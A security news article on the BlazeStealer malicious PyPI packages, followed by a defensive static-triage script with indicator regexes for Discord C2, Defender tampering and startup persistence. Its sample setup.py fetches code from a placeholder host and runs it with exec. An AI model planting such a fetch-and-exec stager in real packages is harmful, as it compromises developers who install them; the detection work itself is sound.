Malicious Python packages masquerading as legitimate code obfuscation tools are targeting developers via the PyPI code repository.
Focusing on those interested in code obfuscation is a savvy choice that could offer up organizational crown jewels, according to researchers at Checkmarx, who dubbed the malware “BlazeStealer.”
They warned on Nov. 8 that BlazeStealer is particularly concerning because it can exfiltrate host data, steal passwords, launch keyloggers, encrypt files, and execute host commands. It becomes even more dangerous thanks to the astute choice of targets, according to Checkmarx threat researcher Yehuda Gelb.
“Developers who engage in code obfuscation are likely working with valuable and sensitive information. As a result, hackers see them as valuable targets to pursue and therefore are likely to be the victims targeted in this attack,” Gelb explains.
BlazeStealer is the latest in a wave of compromised Python packages attackers have released in 2023. In July, Wiz researchers warned of PyLoose, malware consisting of Python code that loads an XMRig miner directly into a computer’s memory, using the Linux memfd facility to run filelessly. At the time, Wiz observed nearly 200 instances in which the attackers used it for cryptomining.
For its part, Checkmarx has tracked various malicious Python-based packages, including its September 2023 discovery of culturestreak, which runs a concurrent loop to tie up system resources for unauthorized Dero cryptocurrency mining.
Firing Up BlazeStealer Malware
The BlazeStealer payload can extract a malicious script from an external source, giving attackers complete control over the victim’s computer. According to Gelb, the malicious BlazeStealer payload activates once it is installed on the compromised system.
For command and control, BlazeStealer runs a bot over the Discord messaging service, addressed by a unique identifier.
“This bot, once activated, effectively provides the attacker full control of the target’s system, allowing them to perform a myriad of harmful actions on the victim’s machine,” Gelb warns. Besides gathering detailed host data, BlazeStealer can download files, deactivate Windows Defender and Task Manager, and lock a computer by overloading the CPU. It can also shut the computer down by running a batch script placed in the startup directory, or force a blue screen of death (BSOD) with a Python script.
BlazeStealer can also take control of a PC’s webcam using a bot that stealthily downloads a .ZIP file from a remote server and installs the freeware application WebCamImageSave.exe.
“This allows the bot to secretly capture a photo using the webcam. The resulting image is then sent back to the Discord channel without leaving any evidence of its presence after deleting the downloaded files,” Gelb notes.
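The behaviors reported above (an install-time stager that fetches and executes remote code, Discord-based command and control, startup-folder persistence, Defender and Task Manager tampering, and the WebCamImageSave.exe download) can be turned into a static triage check for Python packages before they are installed. The following is an added example written for this article, not code from Checkmarx or from the malware; the indicator patterns, the function names and the sample package sources are constructed assumptions for illustration.

```python
import ast
import re

# Coarse indicator patterns derived from the behaviours described in the
# article. Constructed for this example; tune them for your own environment.
STRING_INDICATORS = {
    "discord_c2": re.compile(r"discord(app)?\.com|discord\.gg", re.I),
    "startup_persistence": re.compile(r"Programs[\\/]+Startup", re.I),
    "defender_tamper": re.compile(r"DisableRealtimeMonitoring|DisableAntiSpyware|taskmgr", re.I),
    "webcam_tool": re.compile(r"WebCamImageSave\.exe", re.I),
}
# Heuristic: a file that both talks to the network and calls exec/eval is
# the install-time "fetch a script and run it" pattern the article describes.
NETWORK_FUNCS = {"urlopen", "urlretrieve", "get", "post"}
DYNAMIC_EXEC = {"exec", "eval"}


def _call_name(node: ast.Call) -> str:
    """Bare callee name of a Call node: exec -> 'exec', requests.get -> 'get'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def triage_package_source(source: str) -> dict:
    """Statically triage one Python file (e.g. setup.py) from a package.
    Returns the sorted indicator names that fired and an overall verdict."""
    hits = {name for name, rx in STRING_INDICATORS.items() if rx.search(source)}
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # Code that will not parse is itself worth a closer look.
        hits.add("unparseable_source")
        return {"hits": sorted(hits), "suspicious": True}
    calls = {_call_name(n) for n in ast.walk(tree) if isinstance(n, ast.Call)}
    if calls & DYNAMIC_EXEC and calls & NETWORK_FUNCS:
        hits.add("remote_code_exec")
    return {"hits": sorted(hits), "suspicious": bool(hits)}


# Constructed sample inputs (not real packages): one mimicking the stager
# pattern with a Discord reference, one ordinary setup.py.
SAMPLE_SETUP = '''
import requests
from setuptools import setup
src = requests.get("https://PLACEHOLDER.example/stage.py").text
exec(src)
WEBHOOK = "https://discord.com/api/webhooks/PLACEHOLDER"
setup(name="pkg-PLACEHOLDER")
'''
CLEAN_SETUP = '''
from setuptools import setup
setup(name="example-clean", version="1.0")
'''
```

Run `triage_package_source` over every `.py` file in an extracted sdist or wheel; a `remote_code_exec` hit in `setup.py` deserves manual review regardless of the other indicators.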